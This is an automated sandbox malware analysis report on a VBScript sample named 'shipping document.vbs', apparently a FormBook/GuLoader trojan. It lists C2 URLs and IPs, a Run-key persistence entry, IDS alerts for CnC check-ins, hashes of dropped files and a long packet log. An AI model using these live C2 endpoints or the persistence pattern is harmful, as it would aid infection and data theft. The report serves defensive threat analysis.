www.jthzbrdb.fun | 80.240.20.220 | true | true | | unknown
www.ordinarythoughts.org | unknown | unknown | true | | unknown

Name | Malicious | Antivirus Detection | Reputation
http://www.jthzbrdb.fun/3g97/?Z0cP=R2YdndZh2B6&jJEDgF=0byNfP8xYbFTvv3QATAnaN6BV2N8MY8k+A1BHdxmY/MfvALInVuskjfkuf2FjiBL/p+WASS1FPmyok1wO3yhJjDvkLInRorT+v+nJR1Y5dgJEbJjbg== | true | | unknown
http://www.a-two-spa-salon.com/3g97/ | true | | unknown
http://www.a-two-spa-salon.com/3g97/?jJEDgF=14Ldh71M1tAlq6177H/PKNF5DbUzFdqFN6RtTIloW1xTPtpRPWfTFb1ZY6KJ/sGolC/raog+W4a2BjveEWOkXEr3vevJ7TDEj044XktAOzbrek1ipg==&Z0cP=R2YdndZh2B6 | true | | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
142.251.35.161 | drive.usercontent.google.com | United States | 15169 | GOOGLEUS | false
142.251.41.14 | drive.google.com | United States | 15169 | GOOGLEUS | false
157.7.107.63 | www.a-two-spa-salon.com | Japan | 7506 | INTERQGMOInternetIncJP | true
80.240.20.220 | www.jthzbrdb.fun | Germany | 20473 | AS-CHOOPAUS | true
Joe Sandbox version: 40.0.0 Tourmaline
Analysis ID: 1430120
Start date and time: 2024-04-23 07:52:16 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 9m 40s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 22
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 2
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: shipping document.vbs
Detection: MAL
Classification: mal100.troj.spyw.expl.evad.winVBS@22/10@6/4
EGA Information:
• Successful, ratio: 33.3%
HCA Information:
• Successful, ratio: 79%
• Number of executed functions: 27
• Number of non-executed functions: 229
Cookbook Comments:
• Found application associated with file extension: .vbs
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 72.21.81.240
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, wu.ec.azureedge.net, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, ctldl.windowsupdate.com, wu-bg-shim.trafficmanager.net, wu.azureedge.net, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target powershell.exe, PID 5852 because it is empty
• Execution Graph export aborted for target powershell.exe, PID 6856 because it is empty
• HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• Not all processes where analyzed, report is missing behavior information
• Report creation exceeded maximum time and may have missing disassembly code information.
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtCreateKey calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description
06:54:45 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run -PVHSLDXBF C:\Program Files (x86)\windows mail\wab.exe
06:54:53 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run -PVHSLDXBF C:\Program Files (x86)\windows mail\wab.exe
07:53:23 | API Interceptor | 1x Sleep call for process: wscript.exe modified
07:53:36 | API Interceptor | 329x Sleep call for process: powershell.exe modified
07:55:17 | API Interceptor | 10x Sleep call for process: openfiles.exe modified
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
80.240.20.220 | NEW ORDER.vbs | | malicious | FormBook, GuLoader | |

Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
www.jthzbrdb.fun | NEW ORDER.vbs | | malicious | FormBook, GuLoader | | 80.240.20.220
                                                          No context
                                                          Process:C:\Windows\System32\wscript.exe
                                                          File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 69993 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                                                          Category:dropped
                                                          Size (bytes):69993
                                                          Entropy (8bit):7.99584879649948
                                                          Encrypted:true
                                                          SSDEEP:1536:iMveRG6BWC7T2g1wGUa5QUoaIB9ttiFJG+AOQOXl0Usvwr:feRG6BX6gUaHo9tkBHiUewr
                                                          MD5:29F65BA8E88C063813CC50A4EA544E93
                                                          SHA1:05A7040D5C127E68C25D81CC51271FFB8BEF3568
                                                          SHA-256:1ED81FA8DFB6999A9FEDC6E779138FFD99568992E22D300ACD181A6D2C8DE184
                                                          SHA-512:E29B2E92C496245BED3372578074407E8EF8882906CE10C35B3C8DEEBFEFE01B5FD7F3030ACAA693E175F4B7ACA6CD7D8D10AE1C731B09C5FA19035E005DE3AA
                                                          Malicious:false
                                                          Process:C:\Windows\System32\wscript.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):330
                                                          Entropy (8bit):3.1414940076987787
                                                          Encrypted:false
                                                          SSDEEP:6:kKUF/lDN+SkQlPlEGYRMY9z+4KlDA3RUeVlWI/Vt:cF/lMkPlE99SNxAhUeVLVt
                                                          MD5:F1C6482040F00B9F8A01BCE942BF6467
                                                          SHA1:FA195AFFEECD8C4C977175986DD52129CF4E0FFD
                                                          SHA-256:492E49C8F9A777B5F852FD0A3D628EAE69B8B2BBB83EB5D01343D2F5EFAE28CE
                                                          SHA-512:AB6765ED3E1283FB2BACD5468BBFDED14D8211F2A47424373DF815FFA728F689F932BAF59228625940536000C2AB8832724FCB25DA1ACF2408C48D4F758F0891
                                                          Malicious:false
                                                          Preview:p...... ........OB..B...(....................................................... ........M.........(...........i...h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".b.3.6.8.5.3.8.5.a.4.7.f.d.a.1.:.0."...
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:data
                                                          Category:modified
                                                          Size (bytes):11608
                                                          Entropy (8bit):4.886255615007755
                                                          Encrypted:false
                                                          SSDEEP:192:Pxoe5lpOdxoe56ib49Vsm5emdiVFn3eGOVpN6K3bkkjo5agkjDt4iWN3yBGHB9sT:lVib49+VoGIpN6KQkj2xkjh4iUx4cYK6
                                                          MD5:C7F7A26360E678A83AFAB85054B538EA
                                                          SHA1:B9C885922370EE7573E7C8CF0DDB8D97B7F6F022
                                                          SHA-256:C3D527BCA7A1D1A398F5BE0C70237BD69281601DFD7D1ED6D389B2FD8E3BC713
                                                          SHA-512:9F2F9DA5F4BF202A08BADCD4EF9CE159269EF47B657C6F67DC3C9FDB4EE0005CE5D0A9B4218DB383BAD53222B728B77B591CB5F41781AB30EF145CC7DB7D4F77
                                                          Malicious:false
                                                          Preview:PSMODULECACHE......e..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.............z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):64
                                                          Entropy (8bit):1.1940658735648508
                                                          Encrypted:false
                                                          SSDEEP:3:NlllulJnp/p:NllU
                                                          MD5:BC6DB77EB243BF62DC31267706650173
                                                          SHA1:9E42FEFC2E92DE0DB2A2C9911C866320E41B30FF
                                                          SHA-256:5B000939E436B6D314E3262887D8DB6E489A0DDF1E10E5D3D80F55AA25C9FC27
                                                          SHA-512:91DC4935874ECA2A4C8DE303D83081FE945C590208BB844324D1E0C88068495E30AAE2321B3BA8A762BA08DAAEB75D9931522A47C5317766C27E6CE7D04BEEA9
                                                          Malicious:false
                                                          Process:C:\Windows\SysWOW64\openfiles.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                          Category:dropped
                                                          Size (bytes):196608
                                                          Entropy (8bit):1.1221538113908904
                                                          Encrypted:false
                                                          SSDEEP:192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8ESRR9crV+J3mLxAXd:r2qOB1nxCkvSAELyKOMq+8ETZKoxAX
                                                          MD5:C1AE02DC8BFF5DD65491BF71C0B740A7
                                                          SHA1:6B68C7B76FB3D1F36D6CF003C60B1571C62C0E0F
                                                          SHA-256:CF2E96737B5DDC980E0F71003E391399AAE5124C091C254E4CCCBC2A370757D7
                                                          SHA-512:01F8CA51310726726B0B936385C869CDDBC9DD996B488E539B72C580BD394219774C435482E618D58EB8F08D411411B63912105E4047CB29F845B2D07DE3E0E1
                                                          Malicious:false
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with very long lines (65536), with no line terminators
                                                          Category:dropped
                                                          Size (bytes):433144
                                                          Entropy (8bit):5.969365294127977
                                                          Encrypted:false
                                                          SSDEEP:6144:29fzVUU6e0scuJPzEqSQ7/+djGPX3XCGJYaCrM7NJXX3ea2Ds+4CBjQuG8+AblYn:2lVh5cuJPz5Cx6XCG6axZE/4UqMlYn
                                                          MD5:AF535DCBB662B0A33195E62523475006
                                                          SHA1:5FDE78818872AEDE6C1DB9C660702775B8254961
                                                          SHA-256:E61232040BEB48A5E1E73664CC1E066C5C8A633A67D6B219669121C0FD0DDF55
                                                          SHA-512:2DA2E2240AD6A4AE1EC10714CB38F37ACE6A173E6122B1E7513E9768A496E25EF433305328143DF92DC02B4980977F4396C5E4074050387F607792674A7E3362
                                                          Malicious:false
                                                          File type:ASCII text, with CRLF line terminators
                                                          Entropy (8bit):5.106483057853362
                                                          TrID:
                                                            File name:shipping document.vbs
                                                            File size:285'416 bytes
                                                            MD5:1dce662b3782fbec7c5f4f73d8e63f41
                                                            SHA1:25cf442e9e62d5a83dd81c980da84c5ec27dac75
                                                            SHA256:35b1922951d049fedf34ebd18d57fd8acccaf65e462c6dc6308f5d63e17381ee
                                                            SHA512:0b51ae1e312a172e96704371ad4a67a3a30269bba4100e92e6c2265d22696e105b51b955d23ce932f1480aa74acee4a98c512416dfa11aa266e2ca3fc27f63a1
                                                            SSDEEP:6144:LXdAYDLBLW+8A1ytW3xrbjsSFuHeEC57kdmXl45zaoGGqAP3MQ9scOcM8/DskFsO:7nS2Im3GgFVYp
                                                            TLSH:B6544AA0CFCA26394F5B2FDABD60459289FC8199021224BDE6D907AD7243D6CD3FED14
                                                            File Content Preview:....Fastansattesredisplayed = LTrim("Obducenterne") ....Rem Inscrutability! nightclothes dalstrkning aftrappet, preciseste charlatanish unwilting convicinity malaccident..Rem Negrene hemmelighedskrmmernes patruljevagten. parkinsonia! rugbrdsmotoren bogens
                                                            Icon Hash:68d69b8f86ab9a86
                                                            Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
                                                            04/23/24-07:55:11.026123 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49720 | 80 | 192.168.2.9 | 157.7.107.63
                                                            04/23/24-07:55:13.838498 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49721 | 80 | 192.168.2.9 | 157.7.107.63
                                                            04/23/24-07:55:19.489536 | TCP | 2855465 | ETPRO TROJAN FormBook CnC Checkin (GET) M2 | 49723 | 80 | 192.168.2.9 | 157.7.107.63
                                                            04/23/24-07:55:34.111211 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49724 | 80 | 192.168.2.9 | 172.217.16.36
                                                            04/23/24-07:54:55.001136 | TCP | 2855465 | ETPRO TROJAN FormBook CnC Checkin (GET) M2 | 49719 | 80 | 192.168.2.9 | 80.240.20.220
                                                            Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                            Apr 23, 2024 07:53:41.746136904 CEST44349707142.251.35.161192.168.2.9
                                                            Apr 23, 2024 07:53:41.746192932 CEST49707443192.168.2.9142.251.35.161
                                                            Apr 23, 2024 07:53:41.746201992 CEST44349707142.251.35.161192.168.2.9
                                                            Apr 23, 2024 07:53:41.750122070 CEST44349707142.251.35.161192.168.2.9
                                                            Apr 23, 2024 07:53:41.750231028 CEST49707443192.168.2.9142.251.35.161
                                                            Apr 23, 2024 07:53:41.750238895 CEST44349707142.251.35.161192.168.2.9
                                                            Apr 23, 2024 07:53:41.753994942 CEST44349707142.251.35.161192.168.2.9
                                                            Apr 23, 2024 07:53:41.754105091 CEST49707443192.168.2.9142.251.35.161
                                                            Apr 23, 2024 07:53:41.754116058 CEST44349707142.251.35.161192.168.2.9
                                                            Apr 23, 2024 07:53:41.757764101 CEST44349707142.251.35.161192.168.2.9
                                                            Apr 23, 2024 07:53:41.757884979 CEST49707443192.168.2.9142.251.35.161
                                                            Apr 23, 2024 07:53:41.757894993 CEST44349707142.251.35.161192.168.2.9
                                                            Apr 23, 2024 07:53:41.761604071 CEST44349707142.251.35.161192.168.2.9
                                                            Apr 23, 2024 07:53:41.761740923 CEST49707443192.168.2.9142.251.35.161
                                                            Apr 23, 2024 07:53:41.761750937 CEST44349707142.251.35.161192.168.2.9
                                                            Apr 23, 2024 07:53:41.765294075 CEST44349707142.251.35.161192.168.2.9
                                                            Apr 23, 2024 07:53:41.765364885 CEST49707443192.168.2.9142.251.35.161
                                                            Apr 23, 2024 07:53:41.765377045 CEST44349707142.251.35.161192.168.2.9
                                                            Apr 23, 2024 07:53:41.770746946 CEST44349707142.251.35.161192.168.2.9
                                                            Apr 23, 2024 07:53:41.770776987 CEST44349707142.251.35.161192.168.2.9
                                                            Apr 23, 2024 07:53:41.770833969 CEST49707443192.168.2.9142.251.35.161
                                                            Apr 23, 2024 07:53:41.770845890 CEST44349707142.251.35.161192.168.2.9
                                                            Apr 23, 2024 07:53:41.770952940 CEST49707443192.168.2.9142.251.35.161
                                                            Apr 23, 2024 07:53:41.774408102 CEST44349707142.251.35.161192.168.2.9
                                                            Apr 23, 2024 07:53:41.778150082 CEST44349707142.251.35.161192.168.2.9
                                                            Apr 23, 2024 07:53:41.778176069 CEST44349707142.251.35.161192.168.2.9
                                                            Apr 23, 2024 07:53:41.778234959 CEST49707443192.168.2.9142.251.35.161
                                                            Apr 23, 2024 07:53:41.778254986 CEST44349707142.251.35.161192.168.2.9
                                                            Apr 23, 2024 07:53:41.778316021 CEST49707443192.168.2.9142.251.35.161
                                                            Apr 23, 2024 07:53:41.780495882 CEST44349707142.251.35.161192.168.2.9
                                                            Apr 23, 2024 07:53:41.782718897 CEST44349707142.251.35.161192.168.2.9
                                                            Apr 23, 2024 07:53:41.782738924 CEST44349707142.251.35.161192.168.2.9
                                                            Apr 23, 2024 07:53:41.782820940 CEST49707443192.168.2.9142.251.35.161
                                                            Apr 23, 2024 07:53:41.782830000 CEST44349707142.251.35.161192.168.2.9
                                                            Apr 23, 2024 07:53:41.783011913 CEST49707443192.168.2.9142.251.35.161
                                                            Apr 23, 2024 07:53:41.784935951 CEST44349707142.251.35.161192.168.2.9
                                                            Apr 23, 2024 07:53:41.787302971 CEST44349707142.251.35.161192.168.2.9
                                                            Apr 23, 2024 07:53:41.787336111 CEST44349707142.251.35.161192.168.2.9
                                                            Apr 23, 2024 07:53:41.787373066 CEST49707443192.168.2.9142.251.35.161
                                                            Apr 23, 2024 07:53:41.787380934 CEST44349707142.251.35.161192.168.2.9
                                                            Apr 23, 2024 07:53:41.787436962 CEST49707443192.168.2.9142.251.35.161
                                                            Apr 23, 2024 07:53:41.789546967 CEST44349707142.251.35.161192.168.2.9
                                                            Apr 23, 2024 07:53:41.791568995 CEST44349707142.251.35.161192.168.2.9
                                                            Apr 23, 2024 07:53:41.791594028 CEST44349707142.251.35.161192.168.2.9
                                                            Apr 23, 2024 07:53:41.791641951 CEST49707443192.168.2.9142.251.35.161
                                                            Apr 23, 2024 07:53:41.791651011 CEST44349707142.251.35.161192.168.2.9
                                                            Apr 23, 2024 07:53:41.791733027 CEST49707443192.168.2.9142.251.35.161
                                                            Apr 23, 2024 07:53:41.793740034 CEST44349707142.251.35.161192.168.2.9
                                                            Apr 23, 2024 07:53:41.795886040 CEST44349707142.251.35.161192.168.2.9
                                                            Apr 23, 2024 07:53:41.795905113 CEST44349707142.251.35.161192.168.2.9
                                                            Apr 23, 2024 07:53:41.795950890 CEST49707443192.168.2.9142.251.35.161
                                                            Apr 23, 2024 07:53:41.795960903 CEST44349707142.251.35.161192.168.2.9
                                                            Apr 23, 2024 07:53:41.796017885 CEST49707443192.168.2.9142.251.35.161
                                                            Apr 23, 2024 07:53:41.797996044 CEST44349707142.251.35.161192.168.2.9
                                                            Apr 23, 2024 07:53:41.800081015 CEST44349707142.251.35.161192.168.2.9
                                                            Apr 23, 2024 07:53:41.800144911 CEST49707443192.168.2.9142.251.35.161
                                                            Apr 23, 2024 07:53:41.800153971 CEST44349707142.251.35.161192.168.2.9
                                                            Apr 23, 2024 07:53:41.801171064 CEST44349707142.251.35.161192.168.2.9
                                                            Apr 23, 2024 07:53:41.801286936 CEST49707443192.168.2.9142.251.35.161
                                                            Apr 23, 2024 07:53:41.801300049 CEST44349707142.251.35.161192.168.2.9
                                                            Apr 23, 2024 07:53:41.803226948 CEST44349707142.251.35.161192.168.2.9
                                                            Apr 23, 2024 07:53:41.803406954 CEST49707443192.168.2.9142.251.35.161
                                                            Apr 23, 2024 07:53:41.803419113 CEST44349707142.251.35.161192.168.2.9
                                                            Apr 23, 2024 07:53:41.805253983 CEST44349707142.251.35.161192.168.2.9
                                                            Apr 23, 2024 07:53:41.805346966 CEST49707443192.168.2.9142.251.35.161
                                                            Apr 23, 2024 07:53:41.805358887 CEST44349707142.251.35.161192.168.2.9
                                                            Apr 23, 2024 07:53:41.807390928 CEST44349707142.251.35.161192.168.2.9
                                                            Apr 23, 2024 07:53:41.807490110 CEST49707443192.168.2.9142.251.35.161
                                                            Apr 23, 2024 07:53:41.807497978 CEST44349707142.251.35.161192.168.2.9
                                                            Apr 23, 2024 07:53:41.809391022 CEST44349707142.251.35.161192.168.2.9
                                                            Apr 23, 2024 07:53:41.809462070 CEST49707443192.168.2.9142.251.35.161
                                                            Apr 23, 2024 07:53:41.809468985 CEST44349707142.251.35.161192.168.2.9
                                                            Apr 23, 2024 07:53:41.811224937 CEST44349707142.251.35.161192.168.2.9
                                                            Apr 23, 2024 07:53:41.811342955 CEST49707443192.168.2.9142.251.35.161
                                                            Apr 23, 2024 07:53:41.811350107 CEST44349707142.251.35.161192.168.2.9
                                                            Apr 23, 2024 07:53:41.813201904 CEST44349707142.251.35.161192.168.2.9
                                                            Apr 23, 2024 07:53:41.813318968 CEST49707443192.168.2.9142.251.35.161
                                                            Apr 23, 2024 07:53:41.813327074 CEST44349707142.251.35.161192.168.2.9
                                                            Apr 23, 2024 07:53:41.815171957 CEST44349707142.251.35.161192.168.2.9
                                                            Apr 23, 2024 07:53:41.815243959 CEST49707443192.168.2.9142.251.35.161
                                                            Apr 23, 2024 07:53:41.815249920 CEST44349707142.251.35.161192.168.2.9
                                                            Apr 23, 2024 07:53:41.816963911 CEST44349707142.251.35.161192.168.2.9
                                                            Apr 23, 2024 07:53:41.817044020 CEST49707443192.168.2.9142.251.35.161
                                                            Apr 23, 2024 07:53:41.817051888 CEST44349707142.251.35.161192.168.2.9
                                                            Apr 23, 2024 07:53:41.818892956 CEST44349707142.251.35.161192.168.2.9
                                                            Apr 23, 2024 07:53:41.818950891 CEST49707443192.168.2.9142.251.35.161
                                                            Apr 23, 2024 07:53:41.818958998 CEST44349707142.251.35.161192.168.2.9
                                                            Apr 23, 2024 07:53:41.820696115 CEST44349707142.251.35.161192.168.2.9
                                                            Apr 23, 2024 07:53:41.820754051 CEST49707443192.168.2.9142.251.35.161
                                                            Apr 23, 2024 07:53:41.820765018 CEST44349707142.251.35.161192.168.2.9
                                                            Apr 23, 2024 07:53:41.822545052 CEST44349707142.251.35.161192.168.2.9
                                                            Apr 23, 2024 07:53:41.822607040 CEST49707443192.168.2.9142.251.35.161
                                                            Apr 23, 2024 07:53:41.822616100 CEST44349707142.251.35.161192.168.2.9
                                                            Apr 23, 2024 07:53:41.825093031 CEST44349707142.251.35.161192.168.2.9
                                                            Apr 23, 2024 07:53:41.825122118 CEST44349707142.251.35.161192.168.2.9
                                                            Apr 23, 2024 07:53:41.825160980 CEST49707443192.168.2.9142.251.35.161
                                                            Apr 23, 2024 07:53:41.825170994 CEST44349707142.251.35.161192.168.2.9
                                                            Apr 23, 2024 07:53:41.825360060 CEST49707443192.168.2.9142.251.35.161
                                                            Apr 23, 2024 07:53:41.826849937 CEST44349707142.251.35.161192.168.2.9
                                                            Apr 23, 2024 07:53:41.828625917 CEST44349707142.251.35.161192.168.2.9
                                                            Apr 23, 2024 07:53:41.828651905 CEST44349707142.251.35.161192.168.2.9
                                                            Apr 23, 2024 07:53:41.828685999 CEST49707443192.168.2.9142.251.35.161
                                                            Apr 23, 2024 07:53:41.828695059 CEST44349707142.251.35.161192.168.2.9
                                                            Apr 23, 2024 07:53:41.828861952 CEST49707443192.168.2.9142.251.35.161
                                                            Apr 23, 2024 07:53:41.830382109 CEST44349707142.251.35.161192.168.2.9
                                                            Apr 23, 2024 07:53:41.832096100 CEST44349707142.251.35.161192.168.2.9
                                                            Apr 23, 2024 07:53:41.832151890 CEST44349707142.251.35.161192.168.2.9
                                                            Apr 23, 2024 07:53:41.832180023 CEST49707443192.168.2.9142.251.35.161
                                                            Apr 23, 2024 07:53:41.832190037 CEST44349707142.251.35.161192.168.2.9
                                                            Apr 23, 2024 07:53:41.832231045 CEST49707443192.168.2.9142.251.35.161
                                                            Apr 23, 2024 07:53:41.833787918 CEST44349707142.251.35.161192.168.2.9
                                                            Apr 23, 2024 07:53:41.835500956 CEST44349707142.251.35.161192.168.2.9
                                                            Apr 23, 2024 07:53:41.835526943 CEST44349707142.251.35.161192.168.2.9
                                                            Apr 23, 2024 07:53:41.835576057 CEST49707443192.168.2.9142.251.35.161
                                                            Apr 23, 2024 07:53:41.835583925 CEST44349707142.251.35.161192.168.2.9
                                                            Apr 23, 2024 07:53:41.835638046 CEST49707443192.168.2.9142.251.35.161
                                                            Apr 23, 2024 07:53:41.837251902 CEST44349707142.251.35.161192.168.2.9
                                                            Apr 23, 2024 07:53:41.838920116 CEST44349707142.251.35.161192.168.2.9
                                                            Apr 23, 2024 07:53:41.838949919 CEST44349707142.251.35.161192.168.2.9
                                                            Apr 23, 2024 07:53:41.838998079 CEST49707443192.168.2.9142.251.35.161
                                                            Apr 23, 2024 07:53:41.839013100 CEST44349707142.251.35.161192.168.2.9
                                                            Apr 23, 2024 07:53:41.839087963 CEST49707443192.168.2.9142.251.35.161
                                                            Apr 23, 2024 07:53:41.840590000 CEST44349707142.251.35.161192.168.2.9
                                                            Apr 23, 2024 07:53:41.842259884 CEST44349707142.251.35.161192.168.2.9
                                                            Apr 23, 2024 07:53:41.842288017 CEST44349707142.251.35.161192.168.2.9
                                                            Apr 23, 2024 07:53:41.842358112 CEST49707443192.168.2.9142.251.35.161
                                                            Apr 23, 2024 07:53:41.842366934 CEST44349707142.251.35.161192.168.2.9
                                                            Apr 23, 2024 07:53:41.842489004 CEST49707443192.168.2.9142.251.35.161
                                                            Apr 23, 2024 07:53:41.843903065 CEST44349707142.251.35.161192.168.2.9
                                                            Apr 23, 2024 07:53:41.845561028 CEST44349707142.251.35.161192.168.2.9
                                                            Apr 23, 2024 07:53:41.845717907 CEST49707443192.168.2.9142.251.35.161
                                                            Apr 23, 2024 07:53:41.845727921 CEST44349707142.251.35.161192.168.2.9
                                                            Apr 23, 2024 07:53:41.846491098 CEST44349707142.251.35.161192.168.2.9
                                                            Apr 23, 2024 07:53:41.846595049 CEST49707443192.168.2.9142.251.35.161
                                                            Apr 23, 2024 07:53:41.846601963 CEST44349707142.251.35.161192.168.2.9
                                                            Apr 23, 2024 07:53:41.847992897 CEST44349707142.251.35.161192.168.2.9
                                                            Apr 23, 2024 07:53:41.848081112 CEST49707443192.168.2.9142.251.35.161
                                                            Apr 23, 2024 07:53:41.848088026 CEST44349707142.251.35.161192.168.2.9
                                                            Apr 23, 2024 07:53:41.849658966 CEST44349707142.251.35.161192.168.2.9
                                                            Apr 23, 2024 07:53:41.849781990 CEST49707443192.168.2.9142.251.35.161
                                                            Apr 23, 2024 07:53:41.849790096 CEST44349707142.251.35.161192.168.2.9
                                                            Apr 23, 2024 07:53:41.851389885 CEST44349707142.251.35.161192.168.2.9
                                                            Apr 23, 2024 07:53:41.851474047 CEST49707443192.168.2.9142.251.35.161
                                                            Apr 23, 2024 07:53:41.851481915 CEST44349707142.251.35.161192.168.2.9
                                                            Apr 23, 2024 07:53:41.852806091 CEST44349707142.251.35.161192.168.2.9
                                                            Apr 23, 2024 07:53:41.852902889 CEST49707443192.168.2.9142.251.35.161
                                                            Apr 23, 2024 07:53:41.852910995 CEST44349707142.251.35.161192.168.2.9
                                                            Apr 23, 2024 07:53:41.854342937 CEST44349707142.251.35.161192.168.2.9
                                                            Apr 23, 2024 07:53:41.854419947 CEST49707443192.168.2.9142.251.35.161
                                                            Apr 23, 2024 07:53:41.854428053 CEST44349707142.251.35.161192.168.2.9
